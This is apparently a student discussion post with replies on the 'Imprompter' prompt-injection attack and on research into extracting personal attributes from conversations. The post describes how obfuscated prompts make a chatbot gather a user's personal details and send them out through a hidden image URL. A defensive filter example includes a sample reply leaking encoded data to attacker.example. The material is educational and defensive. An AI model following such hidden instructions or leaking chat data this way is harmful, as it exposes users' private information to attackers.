In recent years, there has been a significant increase in large language model software, specifically generative AI, and as a result many users have incorporated these tools into their daily routines. However, researchers and hackers have been working to find weaknesses within these AI systems, one particular category being prompt injections (Burgess, 2024). A recent discovery by researchers, an algorithm capable of transforming a prompt into a set of hidden instructions, has become a very concerning issue, because the resulting prompt can direct the model to send private user information to attackers (Burgess, 2024). The attack targets the interaction between users and the AI model they are using: a prompt that looks like harmless nonsense to the user carries instructions the model interprets as commands to be carried out. The danger of this weakness is the access it grants. By giving attackers a path to personal user information such as names, addresses, and other identifying details, it lets malicious actors collect that information without the user ever realizing what has occurred.
The attack, Imprompter, takes an English-language instruction directing the LLM to search its conversation history for user information that may have been entered in previous exchanges; once that information is located, the prompt directs the model to send it back to the hackers (Burgess, 2024). Imprompter's strength lies in how it exploits prompt injection: it manipulates the LLM's input by disguising hidden commands within what looks like randomized text, which the model can still read and act upon (Burgess, 2024). Furthermore, this method goes beyond jailbreaking techniques, the ever-developing class of exploits that bypass an AI system's built-in safety features so that malicious behavior goes undetected. The most alarming aspect of Imprompter is that the attack stays hidden not only when the obfuscated prompt is injected into the AI system but also when the data is delivered to the attacker through a hidden URL, so that to the user the exchange still looks like a regular LLM chat interface (Burgess, 2024).
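The article does not publish Imprompter's actual prompt, so as a rough illustration of the defensive side only, here is a minimal sketch in Python of how an output filter might flag a model reply that embeds chat data in a hidden image URL. The allow-list host, the attacker domain, and the length heuristic are all hypothetical assumptions for the example, not details from the article.

```python
import re
from urllib.parse import urlparse, parse_qs

# Markdown image syntax, e.g. ![](https://host/path?d=...), can render as an
# invisible image in a chat window while its URL quietly carries data.
MD_IMAGE = re.compile(r"!\[[^\]]*\]\((?P<url>https?://[^\s)]+)\)")

ALLOWED_IMAGE_HOSTS = {"cdn.example.com"}  # hypothetical allow-list


def flag_possible_exfiltration(model_output: str) -> list[str]:
    """Return URLs in a model reply that look like hidden data carriers."""
    suspicious = []
    for match in MD_IMAGE.finditer(model_output):
        url = match.group("url")
        parsed = urlparse(url)
        params = parse_qs(parsed.query)
        # An unknown host combined with long query values is a red flag.
        if parsed.hostname not in ALLOWED_IMAGE_HOSTS and any(
            len(value) > 20 for values in params.values() for value in values
        ):
            suspicious.append(url)
    return suspicious


# Example: a reply that silently appends encoded chat data to an attacker URL.
reply = "Sure! ![](https://attacker.example/log?d=Sm9obiBEb2UsIDEyMyBNYWluIFN0)"
print(flag_possible_exfiltration(reply))
```

A real deployment would pair a filter like this with stricter rendering rules (for example, refusing to load images from unknown hosts at all), but the sketch shows why the hidden-URL channel is so easy to miss from the user's side.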
Another key indicator of this issue is research conducted by Anna Tigunova. Her paper Extracting Personal Information from Conversations details the problems surrounding Hidden Attribute Models (HAMs) and Retrieval-based Hidden Attribute Models (RHAMs). These models, presented in 2020, demonstrate AI's potential to extract private user information from ordinary conversational data (Tigunova, 2020). When considering the capabilities of these two approaches, it is essential to note the different kinds of information they can gather. HAM leverages key terms in conversations, allowing it to filter and focus on personal attributes (Tigunova, 2020). RHAM expands this ability by including external document collections, retrieving additional information from sources outside the conversation and thereby broadening the range of attributes that can be predicted (Tigunova, 2020). The methods illustrated by Tigunova align with the concerns raised in the article This Prompt Can Make an AI Chatbot Identify and Extract Personal Details From Your Chats, as both discuss the vulnerabilities created by prompt engineering within AI models.
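To make the idea concrete, here is a deliberately simplified toy sketch of the intuition behind attribute prediction from conversation. This is not Tigunova's actual HAM or RHAM, which are far more sophisticated neural models; the cue words and labels below are invented for the example.

```python
# Toy illustration only: a keyword-scoring stand-in for the idea that
# informative terms in a speaker's utterances can be weighted to predict a
# personal attribute such as profession.
PROFESSION_CUES = {
    "photographer": {"photos", "camera", "shoot", "lens"},
    "nurse": {"patients", "shift", "ward", "hospital"},
    "teacher": {"students", "classroom", "grading", "lesson"},
}


def predict_profession(utterances: list[str]) -> str | None:
    """Guess a profession from the terms a speaker uses, or None if no cue hits."""
    tokens = {word.strip(".,!?").lower() for u in utterances for word in u.split()}
    scores = {label: len(cues & tokens) for label, cues in PROFESSION_CUES.items()}
    best = max(scores, key=scores.get)
    return best if scores[best] > 0 else None


print(predict_profession(["I take photos all day long",
                          "My new lens arrived yesterday"]))  # -> photographer
```

Even this crude version shows why ordinary chat text leaks attributes: no one has to state their job explicitly for a model to infer it.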
Additionally, attacks like Imprompter could exploit RHAM-style techniques to gather and leak user information. Although these vulnerabilities have so far been uncovered and addressed through research rather than by attackers, we must continue researching these issues. By finding holes in AI security before they are exploited, we can prevent large-scale user data leaks from occurring.
References
Burgess, M. (2024, October 17). This prompt can make an AI chatbot identify and extract personal details from your chats. WIRED. https://www.wired.com/story/ai-imprompter-malware-llm/
Tigunova, A. (2020, April). Extracting personal information from conversations. In Companion Proceedings of the Web Conference 2020 (pp. 284-288).
A very timely discussion post! Artificial intelligence is becoming more powerful by the day, and a clever hacking idea like this is very concerning. I think people should stay away from free AI generator sites; this type of free site can inject malicious code into a system, which can be destructive in the future. We must act now to safeguard our personal information, and any suspicious activity in a system should be dealt with as soon as possible. Also, we should not share our personal information in public conversations or in groups.
Great post! AI is a huge issue right now in all fields, I feel, not just cybersecurity. Everyone is scared it's going to take jobs, which I don't think will happen. I think these prompt injections are one of AI's biggest security risks. Though really, the first question is why the personal user information is in the AI model in the first place. Most people don't know or care that any information you put into an AI model gets saved and used to improve the model; that is how the data ends up exposed, making attacks like these possible. The best solution, I feel, is to tackle the issue from both sides. As you mentioned in the post, the security of AI models themselves needs to be bolstered so that the model doesn't release the information when prompted. But I also think checks need to be put in place so that the information isn't given to the AI in the first place, something like a DLP for AI, as in the sketch below.
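To make the "DLP for AI" idea concrete, here is a rough Python sketch that scrubs obvious PII from a prompt before it ever reaches the model. The patterns are simple examples (email, US-style phone number, SSN-like number) chosen for illustration; a real DLP policy would be far more thorough.

```python
import re

# Minimal example patterns; a production DLP would cover many more data types.
PII_PATTERNS = {
    "EMAIL": re.compile(r"[\w.+-]+@[\w-]+\.[\w.-]+"),
    "PHONE": re.compile(r"\b\d{3}[-.\s]\d{3}[-.\s]\d{4}\b"),
    "SSN": re.compile(r"\b\d{3}-\d{2}-\d{4}\b"),
}


def redact(prompt: str) -> str:
    """Replace matched PII with labeled placeholders before calling the LLM."""
    for label, pattern in PII_PATTERNS.items():
        prompt = pattern.sub(f"[{label} REDACTED]", prompt)
    return prompt


print(redact("Email my results to jane.doe@example.com or call 555-123-4567."))
# -> Email my results to [EMAIL REDACTED] or call [PHONE REDACTED].
```

If the data never reaches the model, a prompt injection like Imprompter has nothing sensitive to exfiltrate, which is why pairing this kind of input control with output-side defenses makes sense.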
Tigunova’s research paper highlighted a significant AI vulnerability that can cause data exfiltration from a conversational dialogue. The research also shows how the model can extract personal information using three contextual elements identified in the dialogue: person, attribute, and value. Interestingly, the paper alluded to future work on how RHAM could be integrated with external conversational AI sources as a “Conversational Partner” to clear out conversational noise and resolve ambiguous context. For instance, the paper illustrated how to extract a person’s job by linking two different statements:
A: I take photos all day long
B: Isn’t it a nice thing to do for a living?
From A and B, although the context suggests that the speaker is a photographer, there is still ambiguity as to whether it is a hobby or a job (Tigunova, 2020) [1].
I couldn’t agree more with you. Even though these emerging exploits stemmed from academic research, eavesdroppers will keep finding these vulnerabilities in AI. Great knowledge. Thank you for sharing.
[1] Tigunova, A. (2020, April). Extracting personal information from conversations. ACM Digital Library. https://dl.acm.org/doi/fullHtml/10.1145/3366424.3382089
With AI systems becoming more and more involved in our day-to-day lives, it is essential to enhance our defences against these attacks. Your examination of the weaknesses posed by prompt injection attacks, particularly the Imprompter method, highlights an increasingly important side of AI security that often goes overlooked. It’s striking how these hidden commands can exploit the very design of language models, leading to significant privacy risks.
This article helps explain an urgent issue: the growing susceptibility of AI systems to prompt injection attacks. The ability of Imprompter to harvest private user data without being noticed is terrifying as more users interact with AI every day, and this danger calls the security of AI systems into question. I love that Anna Tigunova’s research was included, because it shows the importance of continuous research into AI safety. I am struck by how the work on HAM and RHAM called out privacy threats long before Imprompter.
This post really highlights a crucial issue as more people incorporate AI into their daily lives, often sharing personal information without fully understanding the risks. With the rise of generative AI, not everyone knows how to follow safety tips when interacting with these systems, making them vulnerable to attacks like Imprompter.
It’s concerning to think that seemingly innocent prompts can hide malicious instructions capable of exposing sensitive data. We need to prioritize educating users about these risks and promote awareness of how to interact safely with AI. By staying informed and proactive, we can help protect ourselves and others from potential data leaks and keep our information secure.
Great post, Harshad! With the increased use of AI tools and applications in daily interactions with data over the internet, and given the nature of these tools, user awareness is more important than ever. First, users need to understand how any AI tool they use works, how it handles input data in terms of privacy, and how long input data will be cached locally. Details about the security measures AI tools take to block or control unauthorized access should also be communicated to users. A zero-trust mindset and minimizing the sharing of personal data can help users reduce their risk when using these AI tools.
Nice post, Harshad! I’m surprised at how much generative AI has improved in such a short time and how easily these models can recover personal information. They can even surface details such as names and addresses, which can identify you and give attackers options for more precise attacks, and you might not even notice it! It is important to set standards for how these tools handle personal information and to give users better options for managing it.
I think that this prompt attack is something that should be taken seriously; I don’t think LLM developers are considering how hackers can exploit this feature to gather information. It would be good to put extra effort into these new vulnerabilities. Thanks for sharing the information!
Great post! AI technology is growing very fast, and its vulnerabilities are as alarming as its usefulness, because hackers are working day and night to learn how to attack users, as the Imprompter attack shows. More user awareness is needed so users know how to protect their data by adopting a zero-trust mindset.